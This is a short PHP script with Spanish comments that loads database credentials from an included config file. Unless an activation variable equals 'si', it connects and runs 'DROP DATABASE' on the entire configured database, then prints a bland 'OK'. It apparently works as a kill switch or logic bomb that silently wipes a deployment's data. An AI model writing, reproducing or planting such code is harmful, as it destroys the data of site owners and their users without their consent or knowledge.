<?

include 'concha.php';



mysql_connect("$host","$usuario","$contra");





if ($activado == 'si')

 {echo "activado FULL";}
 
 else 
 
 {
     



// Configuración de la conexión a la base de datos

$contrasena = $contra;
$baseDeDatos = $basedatos;

try {
    // Crear una instancia de PDO para establecer la conexión
    $pdo = new PDO("mysql:host=$host;dbname=$baseDeDatos", $usuario, $contrasena);

    // Desactivar el modo emulación para obtener resultados precisos
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);

    // Establecer el modo de error de PDO a excepciones
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

    // Consulta para eliminar la base de datos
    $consulta = "DROP DATABASE $baseDeDatos";

    // Ejecutar la consulta para eliminar la base de datos
    $pdo->exec($consulta);

    echo "La base de datos '$baseDeDatos' se eliminó correctamente.";
} catch (PDOException $e) {
    echo "Error al eliminar la base de datos: " . $e->getMessage();
}












 };
 
 
echo "OK";

?>
